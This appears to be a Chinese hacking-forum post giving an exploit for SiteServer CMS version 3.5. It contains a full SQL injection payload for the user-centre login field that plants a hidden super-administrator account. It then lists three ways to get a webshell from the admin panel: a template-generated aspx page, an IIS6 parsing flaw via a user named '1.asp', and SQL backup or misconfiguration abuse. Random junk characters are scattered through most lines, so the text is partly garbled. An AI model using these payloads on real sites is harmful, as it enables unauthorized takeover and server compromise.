经测试秒杀最新的3.5版4 j8 b; Y& q+ c5 {$ ~8 r6 {3 l
stieserver官网:www.siteserver.cn3 t$ [: ^# M7 q, H
EXP:4 ]# l, m& @- B
直接访问UserCenter/login.aspx z% Z% o9 n6 u \- \" [% E
用户名处输入:6 E6 L/ A5 T& m; N) R$ h
$ j( _ R4 M1 Z. t
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–7 V4 i+ q g/ v8 Q
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
; w+ S2 f, `. ^0 N. l4 f. W% R+ g之后再访问后台SiteServer/login.aspx用插入的用户登陆
, P, n3 e: I9 Y4 D+ g7 W后台拿webshell的三种方法:% e" h/ Y0 A. F, Q$ {
一、
7 N7 r# H. j0 d+ w9 \0 n站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 a9 `9 D4 O" a; {二、
* X5 I( [+ m+ B$ m f$ e& R成员权限-》添加用户-》用户名为:1.asp9 j- ~" l+ E" v/ ~
http://127.0.0.1/usercenter/
! N7 Q5 { K9 l2 f用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell3 m& g. R% [# Y; G Y9 n( |
(ps:后台添加用户时不会验证是否含有非法字符)! c# ~5 e1 F; h! f1 r5 p2 `
三、
% Y) t- y4 e( j) ?0 N系统工具-》实用工具-》机器参数查看
; }9 ]! X1 B: j- i, g1 }$ V( ^5 N可以看到数据库类型、名称,WEB路径8 x7 F/ h/ l" q2 _% d! q
系统工具-》数据库工具-》SQL语句查询5 |2 s% Z$ ~" E8 P
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |